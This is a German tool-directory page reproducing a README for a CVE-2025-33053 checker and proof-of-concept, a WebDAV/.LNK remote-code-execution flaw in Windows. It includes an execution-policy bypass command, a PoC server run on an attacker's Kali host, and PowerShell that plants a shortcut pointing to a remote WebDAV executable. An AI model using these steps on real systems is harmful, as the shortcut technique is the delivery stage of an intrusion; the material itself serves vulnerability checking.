Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-33053-Checker-PoC — CVE-2025-33053 Checker und PoC | Kitploit
Tools/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

CVE-2025-33053 Checker und PoC

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-33053 Schwachstellen-Checker & Proof-of-Concept (PoC)

Checker-Nachweis Checker-Nachweis

PoC-Nachweis PoC-Nachweis

Ein vollständiges Set an Tools, um die potenzielle Ausnutzung von CVE-2025-33053 zu prüfen und zu demonstrieren – eine kritische WebDAV-basierte Schwachstelle zur Remotecodeausführung (RCE), die Windows-Systeme betrifft.


📌 Über CVE-2025-33053

CVE-2025-33053 ermöglicht Angreifern, .LNK-Verknüpfungsdateien auszunutzen, die auf bösartige entfernte WebDAV-Freigaben verweisen, was auf betroffenen Systemen potenziell zu Remotecodeausführung (RCE) führen kann.

Schwachstellenbedingungen:

  • Der WebClient-Dienst muss auf dem Zielsystem installiert sein und ausgeführt werden.
  • Das Zielbetriebssystem muss UNC-Pfade über WebDAV auflösen, wenn auf solche Pfade zugegriffen wird — auch über .LNK-Dateien.

🔍 Wie funktioniert die Schwachstelle?

  1. Präparierte .LNK-Datei oder direkter UNC-Pfadzugriff — verweist auf einen entfernten UNC-Pfad wie:
  2. Wenn auf die .LNK-Datei zugegriffen oder der UNC-Pfad manuell aufgerufen wird (z. B. über den Datei-Explorer): - Der WebClient-Dienst initiiert die Kommunikation mit dem entfernten UNC-Speicherort über WebDAV. - Das System sendet eine PROPFIND-Anfrage, um Metadaten vom Server des Angreifers abzufragen.
  3. Beim Empfang der PROPFIND-Anfrage kann der Angreifer bestätigen, dass: - Das Zielsystem UNC-Pfade über WebDAV auflöst. - Das System ist potenziell anfällig für CVE-2025-33053.

✅ Echtzeit-Schwachstellen-Checker (CVE-2025-33053_checker.ps1)

Funktionen:

PrüfungZweck
🔍 Status des WebClient-DienstesBestätigt, ob die WebDAV-Unterstützung aktiv ist und ausgeführt wird.
🔍 UNC-Pfadbehandlung über Test-PathTestet, ob das System entfernte WebDAV-UNC-Pfade auflöst (wichtige Voraussetzung für die CVE-Ausnutzung).

Ausführung:

  1. Öffnen Sie PowerShell als Administrator.

  2. Wenn die Skriptausführung eingeschränkt ist, führen Sie Folgendes aus:

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. Führen Sie den Checker aus: .\CVE-2025-33053_checker.ps1

⚙️ Proof-of-Concept-Server (PoC) (CVE-2025-33053_PoC.py)

Funktionen:

  • Richtet einen Python-basierten WebDAV-ähnlichen Server auf dem Rechner des Angreifers ein.
  • Erfasst eingehende PROPFIND-Anfragen, wenn das Opfersystem den bösartigen UNC-Pfad auflöst.
  • Zeigt im Terminal an, dass sich das System gemeldet hat — was die Ausnutzbarkeit beweist. Hinweis: In einer VM getestet.

Verwendung:

  1. Auf dem Rechner des Angreifers (Kali):
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. Auf dem Zielsystem:
  • Öffnen Sie den UNC-Pfad direkt im Datei-Explorer:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • Erstellen Sie manuell eine .LNK-Datei unter Windows oder navigieren Sie einfach zu:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • Beispiel für eine PowerShell-Methode zum Erstellen einer Verknüpfungsdatei:
root@kitploit:~
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
  1. Wenn das Zielsystem anfällig ist, protokolliert der PoC-Server:
root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 Warum dieses PoC legitim und zuverlässig ist:

✔️ Verwendet echte UNC-Pfadauflösung — keine Simulation. ✔️ Erfasst tatsächliche, vom Betriebssystem ausgelöste PROPFIND-Anfragen — das exakte Verhalten, das für die CVE-Ausnutzung erforderlich ist. ✔️ Demonstriert die Schwachstelle mit echten Nachweisen auf Netzwerkebene, ohne Payloads auszuführen oder Schaden zu verursachen.


🚧 Wichtige Hinweise

Dieses PoC nutzt das Zielsystem nicht aus und schädigt es nicht — es erkennt lediglich das zugrunde liegende anfällige Verhalten. Vorgesehen für die Verwendung in kontrollierten Umgebungen oder mit ausdrücklicher Genehmigung. Demonstriert reales Systemverhalten — keine simulierte Nachstellung. Nur für Bildungszwecke. Nicht auf nicht autorisierten Systemen ausführen.


🏷️ Lizenz

MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke frei nutzbar.


🤝 Mitwirken

Pull-Requests sind willkommen — verbessern Sie die Erkennung, fügen Sie Funktionen hinzu oder schlagen Sie Korrekturen vor.


⚠️ Haftungsausschluss

Dieses Repository dient nur Bildungs- und autorisierten Sicherheitsforschungszwecken. Missbrauch gegen Systeme, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist strengstens untersagt.

Tool herunterladen